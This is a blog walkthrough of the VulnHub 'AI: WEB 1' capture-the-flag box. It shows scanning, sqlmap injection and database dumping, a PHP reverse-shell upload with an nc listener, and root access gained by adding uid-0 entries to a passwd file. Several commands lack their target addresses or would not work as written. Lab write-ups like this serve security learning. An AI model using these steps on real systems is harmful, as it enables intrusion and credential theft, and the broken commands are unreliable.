Pentesting: AI: WEB 1 | Privilege Escalation Attack | Python Reverse Shell | Vulnerabilities | SQL Injection | WriteUp | Walkthrough | VulnHub CTF | Flags

9 min readMay 21, 2024


Hello, friends I’m Shams Ul Mehmood and this is my 4th article. This article is a walkthrough of all about AI: WEB: 1 Vulnhub Box. It includes some type of vulnerabilities like SQL Injection, Python Reverse Shell and User Privilege Escalation. You can find this Vulnhub box from here.


  1. Getting the target machine IP address by Netdiscover utility
  2. Getting open port details by using the Nmap tool
  3. Enumerating HTTP default Port with Dirb / Gobuster / Nikto utilities
  4. Exploitation of Sql Injection Vulnerability
  5. Taking the Python reverse shell and user privilege escalation


📌️ In the first step of the scanning, I used the netdiscover -r commands to perform a Local Network Scan to find out the IP Address of the victim machine.

Command : sudo netdiscover -r


📌️ In the second step, after getting the victim machine’s IP address now I performed a Nmap scan to my victim. I used,

  • -sS : to scan running services.
  • -sV : to scan application version.
  • -p- : to scan all ports on victim machine.
  • -sC : to scan default script.

Command : sudo nmap -sS -p- -sV -sC

📌 ️This was an nmap scan of the network to find the IP address of the target machine. I found that the IP address was, and I found only a single port 80 which was open.

📌 Now I open the target machine ip address in browser.


📌️ In this step, I used the multiple tools like dirb, gobuster and nikto to enumerate interesting hidden files and directories on this target machine.

Command : sudo dirb

Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u

Command : nikto -h

Command : nikto -h

📌 Then in browser search bar I append ‘/robots.txt’ file with victim machine ip address.

📌 Now you can see two parts in robots.txt which were disallow and user-agent.

📌 Now I one-by-one append robots.txt components with the target ip address in browser search bar.

Command :*

Command :

Command :

📌 But they return status codes errors like 404 (Not Found) and 403 (Forbidden).

📌 Then when I append ‘/m3diNf0/’ and ‘info.php’ with target machine ip address in browser search bar.

📌 When I append “/se3reTdir777" with the victim ip address in browser search bar then I found a form page.

Command :

📌 Then I entered some type of user id’s then I get user basic info.


📌 In forth step, I found error-based sql injection vulnerability in this basic web form page by using inverted ‘ in text field.

📌 Then before to launch sql injection exploitation, first I capture the HTTP Requests by using BurpSuite. then save the captured requests in a file then I prefer to start exploitation by using SQLMAP.

📌 Then save the captured requests in attack_request.txt file on desktop then I prefer to start exploitation by using SQLMAP.

📌 Then use the following commands,

Command : ls ./Desktop/

Command : sudo sqlmap -r ./Desktop/attack_request.txt

Command : sudo sqlmap -r ./Desktop/attack_request.txt — dbs

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T systerUser — columns

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user — columns

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user -C firstName, id, lastName — dump

📌 Now we decrypt the encrypted user passwords by using following commands:

Command : sudo echo RmFrZVVzZXJQYXNzdzByZA== | base64 -d

Command : sudo echo TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZJBzYQ== | base64 -d

Command : sudo echo TjB0VGhpczBuZUFsczA= | base64 -d

Command : sudo sqlmap -r ./Desktop/attack_request.txt — dbs — os-pwn

📌 This task takes a few message prompts so I will try and walk you through it. I had to try a few times before I got it right myself.

📌 I went with the default php language option as we know the site is running php and opted in on the full path disclosure, to start.

📌 This is when things get a little tricky.

📌 With some trial and error, I eventually ended up going back to that info.php file we found earlier to discover a slightly unconventional root directory:

Command : /home/www/html/web1x443290o2sdf92213/

📌 The sqlmap ‘os-pwn’ option uploads a malicious payload, so I appended this strange root directory with our discovered uploads directory and saved it to a text file called ‘directory_listing’ and used it with option 3 in our next prompt.

📌 Before that, first I need to add given payload to directory_listing file in root directory of root user by using below commands.

Payload : /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads

Command : pwd

Command : cd /root

Command : nano /root/directory_listing

📌 Paste the above payload to directory_listing file.

📌 Then enter directory_listing file location.

📌 And just when it looked like we were about to get a reverse tcp connection..

📌 But it is failed!

📌 One of the best things about sqlmap, aside from it automating injection trial and error tasks for you, is it also shows you what it is doing.


📌 In 5th step, when we look back at the logs we see this.

📌 Which reveals a php script with an upload form.


📌 Right this makes everything so much easier. We can turn to our favorite php-reverse-shell script, and be good to go.

📌 Now here you can see php-reverse-shell.php

📌 I change the above script to point to my local IP address, and port 1010 for good luck.

📌 I saved the modified copy out as php_script.php.

📌 I then fire up a listener on my local machine by using following command.

Command : nc -lvp 1010

📌 Then browse the php_script.php file in Downloads directory by using upload form.

📌 After select, the php_script.php file with the help of upload form.

📌 The after upload, my file successfuly uploaded.

📌 Ok, now the moment of truth. With our listener still running in the background terminal, we navigate over to php_script.php.

📌 Wow, I have a shell.

📌 Then I was execute following command:

Command : whoami

📌 I used python reverse shell script for tty.

Command : python -c “import pty; pty.spawn(‘/bin/bash’)”

Command : whoami

Command : ls

Command : ls /etc/passwd

📌 Then I wanna show you usernames by using passwd file.

Command : cat /etc/passwd

📌 Here I want to add new multiple usernames to passwd file by using following commands.

Command : echo “root:x:0:0:root:/root:/bin/bash” > passwd

Command : echo “aiweb1pwn:x:0:0:root:/root:/bin/bash” > passwd

Command : echo “cybershark:x:0:0:root:/root:/bin/bash” > passwd

Command : cat passwd

📌 Then I was switched from www-data user to another user aiweb1pwn by using command.

Command : su aiweb1pwn

📌 Then Entered password for aiweb1pwn user.

Password : MyEvilPass_f908sdaf9_sadfasf0sa

Command : whoami

📌 Awesome, I have root-level access to my victim machine.

📌 Then I used the following command to find out required flag.

Command : cd /home/root/

Command : ls

Command : cat flag.txt

CTF Game Over : I am Root!

\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀